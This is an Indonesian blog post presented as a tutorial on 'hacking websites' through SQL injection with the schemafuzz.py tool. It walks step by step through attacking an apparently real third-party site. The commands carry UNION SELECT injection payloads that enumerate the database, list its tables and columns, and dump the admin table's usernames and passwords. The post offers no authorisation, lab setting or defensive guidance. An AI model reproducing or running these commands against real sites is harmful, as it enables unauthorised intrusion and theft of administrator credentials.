Kucing4rt Blog's

Share Informasi Teknologi | Tips Trik | Dunia IT | Artikel | Unik | SEO | Berita

Home » Without category » Tutorial SQLi Injection Dengan Schemafuzz

Tutorial SQLi Injection Dengan Schemafuzz

by poetra , at 13.12 , have 0 komentar
Assallamualaikum Wr Wb,
Pada kesempatan kali ini saya akan berbagi cara hack web dengan tutorial singkat SQLi menggunakan schemafuzz.py.
Oke langsung saja, langkah pertama download schemafuzz DISINI. Langkah berikutnya install python, jika belum ada bisa di download DISINI. Jika python sudah terinstal, langsung jalankan di cmd. Untuk mempermudah silahkan rename schemafuzz.py menjadi root.py dan simpan di Direktori C.
  • Siapkan target, disini saya menggunakan "http://www.perfectpotion.net.cn/article.php?id=36"
  • Buka cmd, ketikkan perintah "cd c:\" lalu "dir" anpa tanda kutip.
  • Kemudian cari jumlah column degnan mengetikan perintah dibawah tanpa tanda kutip, (Lihat Gambar).

    "root.py --findcol -u http://www.perfectpotion.net.cn/article.php?id=36"


    Maka hasilnya akan tampak seperti gambar dibawah :

  • Dari gambar di atas bisa kita lihat bahwa jumlah column adalah 20, null column pada column ke-1. Seperti di SQLi manual, column 1 adalah angka ajaib.
  • Langkah selanjutnya mencari nama database. Ketikkan perintah : root.py --dbs -u (darkc0de URL)

    "root.py --dbs -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19"

    Lihat hasilnya :
  • Dari gambar di atas sudah terlihat nama database yaitu "yf".
    • Untuk melihat table dan column, kita ketikkan perintah "root.py --schema -u (darkc0de URL) -D (database name) "root.py --schema -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf"
    Maka hasilnya akan tampak dalam gambar berikut :
  • Dari gambar di atas sudah terlihat jelas nama table dan column, untuk melihat data dalam column ketikkan perintah "root.py --dump -u (darkc0de URL) -D (database name) -T (table name) -C (column name)

*Untuk menghindari error dalam pembacaan data, saya hanya akan mengambil data di table "admin" dan column "ID,AdminName,AdminPass" saja.

"root.py --dump -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf -T admin -C ID,AdminName,AdminPass"

Anda sedang membaca artikel tentang Tutorial SQLi Injection Dengan Schemafuzz dan anda bisa menemukan artikel Tutorial SQLi Injection Dengan Schemafuzz ini dengan url http://kucing4rt.blogspot.com/2012/04/tutorial-sqli-injection-dengan.html. Terima kasih telah membaca Tutorial SQLi Injection Dengan Schemafuzz .
Tutorial SQLi Injection Dengan Schemafuzz
Tutorial SQLi Injection Dengan Schemafuzz - written by poetra , published at 13.12 . And have 0 komentar
Facebook Twitter Google+ Linkedin Technorati Digg
No comment Add a comment

Terima kasih telah berkunjung.
Jangan lupa tulis komentarnya ya.

Cancel Reply
GetID

Copyright ©2013 Kucing4rt Blog's
Theme designed by Damzaky - Published by Proyek-Template
Powered by Blogger
--> -->